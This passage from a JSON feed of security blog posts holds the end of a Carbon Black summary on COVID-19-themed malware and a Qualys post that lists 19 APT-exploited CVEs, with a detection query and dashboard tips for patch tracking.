**Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-03-19T20:48:06", "published": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
